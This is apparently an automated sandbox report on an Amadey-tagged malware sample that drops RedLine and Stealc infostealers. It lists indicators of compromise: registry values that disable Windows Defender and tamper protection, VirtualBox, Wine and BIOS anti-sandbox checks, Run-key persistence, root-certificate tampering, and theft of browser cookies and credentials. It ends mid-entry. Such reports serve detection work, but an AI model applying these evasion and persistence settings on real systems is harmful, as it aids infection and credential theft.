amadey | 55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	31fbbc958b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	31fbbc958b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	31fbbc958b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	31fbbc958b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	31fbbc958b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	31fbbc958b.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/1424-644-0x00000000003C0000-0x0000000000412000-memory.dmp	family_redline
behavioral1/files/0x000500000001d768-662.dat	family_redline
behavioral1/memory/1896-667-0x0000000000E90000-0x0000000000EE2000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	141fa64e9f.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	141fa64e9f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9694da05e8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9829a32afc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JKECGDBFCB.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	SdVB3P2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e50c478749.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	01664839d8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e724933356.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	31fbbc958b.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2228	powershell.exe
2552	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
2568	chrome.exe
2076	chrome.exe
108	chrome.exe
1648	chrome.exe
1888	chrome.exe
2872	chrome.exe
2980	chrome.exe
480	chrome.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SdVB3P2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	SdVB3P2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e50c478749.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9694da05e8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9829a32afc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	31fbbc958b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	31fbbc958b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JKECGDBFCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JKECGDBFCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	141fa64e9f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	01664839d8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9694da05e8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e724933356.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e50c478749.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9829a32afc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	141fa64e9f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	01664839d8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e724933356.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Executes dropped EXE 35 IoCs

pid	Process
1776	JKECGDBFCB.exe
2904	skotes.exe
1284	SdVB3P2.exe
1076	I0XmI2t.exe
2840	mdjw5me.exe
1436	mdjw5me.exe
1424	DJj.exe
1308	1c6afb9fad.exe
1896	DJj.exe
2348	141fa64e9f.exe
1700	e50c478749.exe
2164	f2258a96f7.exe
1540	7z.exe
2896	7z.exe
1800	7z.exe
2344	7z.exe
3012	7z.exe
2680	7z.exe
3044	7z.exe
1084	7z.exe
2884	in.exe
2396	118e2213a8.exe
1624	05a4c884b7.exe
1556	05a4c884b7.exe
2840	01664839d8.exe
532	9694da05e8.exe
2420	9829a32afc.exe
1940	Intel_PTT_EK_Recertification.exe
2560	e724933356.exe
2644	11efca6d7c.exe
1448	31fbbc958b.exe
3748	6471db0115.exe
3080	f2abdd8ca0.exe
3144	f2abdd8ca0.exe
2564	graph.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	SdVB3P2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	e50c478749.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	e724933356.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	9694da05e8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	9829a32afc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	31fbbc958b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	JKECGDBFCB.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	141fa64e9f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	01664839d8.exe

Loads dropped DLL 55 IoCs

pid	Process
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
2808	cmd.exe
1776	JKECGDBFCB.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2840	mdjw5me.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2828	cmd.exe
1540	7z.exe
2828	cmd.exe
2896	7z.exe
2828	cmd.exe
1800	7z.exe
2828	cmd.exe
2344	7z.exe
2828	cmd.exe
3012	7z.exe
2828	cmd.exe
2680	7z.exe
2828	cmd.exe
3044	7z.exe
2828	cmd.exe
1084	7z.exe
2828	cmd.exe
2828	cmd.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
1624	05a4c884b7.exe
2904	skotes.exe
2904	skotes.exe
1700	e50c478749.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
996	taskeng.exe
996	taskeng.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
2904	skotes.exe
3080	f2abdd8ca0.exe
3748	6471db0115.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	31fbbc958b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	31fbbc958b.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\9829a32afc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021359001\\9829a32afc.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\e724933356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021360001\\e724933356.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\11efca6d7c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021361001\\11efca6d7c.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\31fbbc958b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021362001\\31fbbc958b.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe"	6471db0115.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
193	drive.google.com
194	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
216	ipinfo.io
217	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000500000001da00-922.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
2336	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
1776	JKECGDBFCB.exe
2904	skotes.exe
1284	SdVB3P2.exe
2348	141fa64e9f.exe
1700	e50c478749.exe
2840	01664839d8.exe
532	9694da05e8.exe
2420	9829a32afc.exe
2560	e724933356.exe
1448	31fbbc958b.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2840 set thread context of 1436	2840	mdjw5me.exe	67
PID 1624 set thread context of 1556	1624	05a4c884b7.exe	103
PID 1940 set thread context of 1648	1940	Intel_PTT_EK_Recertification.exe	110
PID 3080 set thread context of 3144	3080	f2abdd8ca0.exe	139

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2884-769-0x000000013FF50000-0x00000001403E0000-memory.dmp	upx
behavioral1/memory/2884-770-0x000000013FF50000-0x00000001403E0000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	6471db0115.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	6471db0115.exe
File created	C:\Program Files\Windows Media Player\graph\graph.exe	6471db0115.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	6471db0115.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	6471db0115.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	JKECGDBFCB.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mdjw5me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	11efca6d7c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DJj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	01664839d8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2258a96f7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	05a4c884b7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9694da05e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	141fa64e9f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9829a32afc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	11efca6d7c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e50c478749.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e724933356.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2abdd8ca0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JKECGDBFCB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mdjw5me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11efca6d7c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2abdd8ca0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SdVB3P2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DJj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	05a4c884b7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	31fbbc958b.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1684	PING.EXE
764	powershell.exe
1752	PING.EXE
1648	powershell.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	55ca4f0439ebe54bb4f45e96e4e29ded011630dcb6719e80d3532acceb7638d7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
2736	taskkill.exe
896	taskkill.exe
1540	taskkill.exe
3008	taskkill.exe
2480	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	SdVB3P2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SdVB3P2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SdVB3P2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	mdjw5me.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37a